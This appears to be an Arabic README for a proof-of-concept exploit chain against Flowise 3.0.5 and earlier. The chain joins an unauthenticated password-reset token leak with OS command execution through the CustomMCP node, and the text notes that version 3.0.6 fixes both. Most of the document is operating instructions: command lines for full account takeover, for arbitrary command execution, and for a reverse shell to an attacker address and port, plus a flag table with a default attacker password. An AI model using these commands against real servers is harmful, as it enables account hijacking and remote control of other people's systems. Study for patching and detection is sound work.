
CVE-2025-58434 و CVE-2025-59528 سلسلة POC
سلسلة استغلال لثغرتين تؤثران على Flowise <= 3.0.5.
تعيد نقطة نهاية إعادة تعيين كلمة المرور رمز إعادة تعيين صالحًا في استجابة API دون الحاجة إلى مصادقة. يمكن للمهاجم الذي يعرف عنوان بريد إلكتروني صالح إعادة تعيين كلمة مرور أي حساب دون تفاعل المستخدم.
تمرّر عقدة CustomMCP إدخالًا يتحكم به المستخدم مباشرة إلى منشئ Function() بصلاحيات Node.js كاملة. يمكن للمستخدم الموثّق الذي يملك مفتاح API صالح تنفيذ أوامر نظام تشغيل عشوائية كمستخدم عملية Flowise.
مُصحّح في: Flowise 3.0.6
pip install requestsسلسلة ATO كاملة (إعادة تعيين كلمة المرور، طلب مفتاح API، تشغيل شل عكسي):
python3 flowise_chain.py -t http://target -e [email protected]
RCE فقط (إذا كان لديك مفتاح API بالفعل):
python3 flowise_chain.py -t http://target --api-key <KEY> -c "id"
شل عكسي بمفتاح موجود:
python3 flowise_chain.py -t http://target --api-key <KEY> --lhost 10.0.0.1 --lport 4444
| العلم | الوصف |
|---|---|
-t, --target | عنوان URL الهدف |
-e, --email | البريد الإلكتروني للحساب الهدف (يُشغّل سلسلة ATO) |
--api-key | توفير مفتاح API مباشرة (يتخطى ATO) |
-c, --command | الأمر المراد تنفيذه |
--lhost | عنوان IP للمهاجم للشل العكسي |
--lport | منفذ المهاجم للشل العكسي (الافتراضي: 4444) |
--new-password | كلمة المرور المراد تعيينها أثناء إعادة التعيين (الافتراضي: Pwn3d!2026) |
-k, --insecure | تخطي التحقق من TLS |
نظرًا لخاصية غريبة في Flowise 3.0.5، فإن نقطة نهاية API لإعادة تعيين كلمة المرور لا تقوم بتحديث بيانات الاعتماد التي يقبلها نقطة نهاية تسجيل الدخول فورًا. يتوقف السكربت بعد إعادة التعيين ويطلب منك تسجيل الدخول إلى الواجهة يدويًا ونسخ مفتاح API من /apikey.